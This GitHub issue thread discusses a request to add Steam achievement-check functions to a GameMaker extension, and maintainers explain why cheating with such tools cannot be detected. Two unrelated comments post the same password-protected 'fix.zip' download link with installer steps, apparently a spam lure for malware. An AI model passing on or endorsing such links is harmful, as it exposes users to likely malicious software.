### ISSUE TITLE
[FEATURE REQUEST] GetUserAchievement

### ISSUE THREAD

**Issue by SuperHebbe** [YoYoGames/GMEXT-Steamworks#92]
Hi

People are using a program to set all achievements to true in my game.
I found out that there is functions to check for that, but not for GameMaker.

bool GetUserAchievement( CSteamID steamIDUser, const char *pchName, bool *pbAchieved );
bool GetUserAchievementAndUnlockTime( CSteamID steamIDUser, const char *pchName, bool *pbAchieved, uint32 *punUnlockTime );

Please implement those functions so I can ban those cheaters. :)

Thanks

Jan Erik

**Comment by nkrapivin** [comment]
Hi,

The functions you're referring to, I think, are only useful inside a game server multiplayer session or if you're friends with the user.
You can obtain achievement status for your current local user with `steam_get_achievement` just fine, at any moment, as long as `steam_stats_ready() == true`.

Also, as a general recommendation, banning people for using Steam Achievement Manager isn't good for reputation, you can fake your CS:GO/TF2/CS2 achievements without issues and Valve won't do anything - because achievements aren't meant to be used for rewarding anything in-game, it's purely a cosmetic thing for the player themselves.

**Comment by SuperHebbe** [comment]
Hi

I really don't like cheaters 🗡️ But since Valve wont do anything about it, I guess I wont either.
Strange thing that Valve don't have any protection for 3rd party programs to access the achievement data for a game.
They even don't have any protection when changing the .exe file itself so I guess they just don't care...

Thanks anyways :)

Jan Erik

**Comment by nkrapivin** [comment]
> Strange thing that Valve don't have any protection for 3rd party programs to access the achievement data for a game.

Because there's no way to differentiate between your game using the Steam API with your App ID, and some random exe using the Steam API with your App ID.
There *are* server-side-only achievements which you can enable, and which cannot be easily cheated, but almost no game is using them.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stuckie** [comment]
Closing as above.
Thanks for the information.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
